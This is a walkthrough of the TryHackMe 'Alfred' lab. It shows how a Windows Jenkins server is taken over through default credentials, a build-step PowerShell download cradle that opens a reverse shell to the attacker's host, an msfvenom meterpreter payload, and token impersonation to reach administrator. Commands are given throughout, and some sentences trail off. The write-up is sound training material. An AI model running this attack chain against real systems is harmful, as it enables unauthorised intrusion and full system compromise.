Alfred is a subscription only room.
This task requires you to deploy the machine and load up Nishang to gain initial access. Nishang is a framework and a collection of scripts and payloads which enable usage of PowerShell for offensive security by nikhil_mitt.
Start by scanning the machine with
nmap. This way, we can see what ports are open.
This will reveal that there are 3 open ports. Ports 80, 3389, 8080.
Referring back to the nmap scan, there are 2 http services. Let’s check these out.
Note: there are two services; one on port 80, and another on port 8080.
This task requires us to crack the Jenkins login, on port 8080 specifically.
Jenkins default credentials
A simple Google search reveals the default admin username for Jenkins is “
After toying around with a few
admin:password potentials–first trying some Batman-related passwords, i.e. Bruce, Wayne, Joker .etc– I stumbled on the password before loading up some brute force tools.
The password is.. you guessed it.. admin.
The username:password flag is
No that we’ve gained access to Jenkins, lets look for some remote code execution vulns.
The script first requires us to start a python server that the site can download the script from.
The Powershell script we need to download is available at the top of the page.
Start Python server
python3 -m http.server
This will make the directory, where the command was run, accessible on 0.0.0.0:8000.
Also accessible on your localhost IP, found via
ip addr command.
So let’s download the PowerShell script (above) and then run the given script. Then, the Jenkins console can download the PowerShell script and run it on the target machine.
TryHackMe provides a command for us to run on the host.
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
Of course, swap your-ip and your-port.
So, at first, I toyed with the Script Console, attempting to exploit some Java scripts to download and run the above PowerShell script.
But, gave up on this after figuring out you can run a shell script in the build options for the project.
The script here will run on build.
Wait for it to finish.
Then, we need to run a
netcat listener. On the port we gave. Run the following command.
nc -l -p 1337
And rebuild the Jenkins project again.
And.. we’re in!
From here, we need to find the user.txt flag.
Using some general knowledge, we should
cd .. up through the system.
And eventually, we see something that clicks.
And finally, we find the user.txt file. And the flag.
Task 2 sees us generating an
msfvenom payload. Running the following command.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
I’d tried to download and run the
msfvenon payload via the previous shell that we’d gotten, but to no avail.
The flag: is about the size of the
msfvenom payload. We can see this by running the
ls -la command. It’s 73802 bytes.
Instead, I found success by running it through the same build options we exploited earlier. But with the new payload.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.8.219:8000/theJoker.exe','theJoker.exe')"
Before going through the build process, we need to
launch the Metasploit “listener”. By running
msfconsole, then using the the
exploit/multi/handler, with the payload we using the previous msfcommand,
Now we’re listening, we can run the build on Jenkins.
After rebuilding, we see the meterpreter session opens successfully.
Ugh, this was a bit of a nightmare.
So, flip the build options BACK to the original netcat route we took. Start a listener
nc -l -p 1234.
Once you get shell, then, run the given powershell command from TryHackMe.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
Make sure not to
cd out of the folder.
Start-Process "theJoker.exe" to run the
Make sure you’re running the
exploit/multi/handler for shell.
From here, we can execute the command
shell for shell.
Then we can see all privileges with
To escape the shell, just hit
Then, we can load the incognito module to exploit two of the enabled privileges, using
Lets see what tokens are available with
From here, we see that the
BUILTIN\Administrators tokens are available and can be impersonated.
After running the command impersonate_token
BUILTIN\\ADMINISTRATORS we get the required output. Note, the double backslash escapes the backslash.
The above confirms we’re impersonating
However, despite us impersonating someone with authority. Our process might not have authority. So let’s grab the PID of the
services.exe process and then
migrate to that process.
Fire off the command
ps | grep services.exe
Then take the PID number–probably different for you–then run the migrate command to “move to” that process owned by the user we’re impersonating.
Now we’ve escalated privilege, to get the root flag, we need to
cd C:\Windows\System32\config , then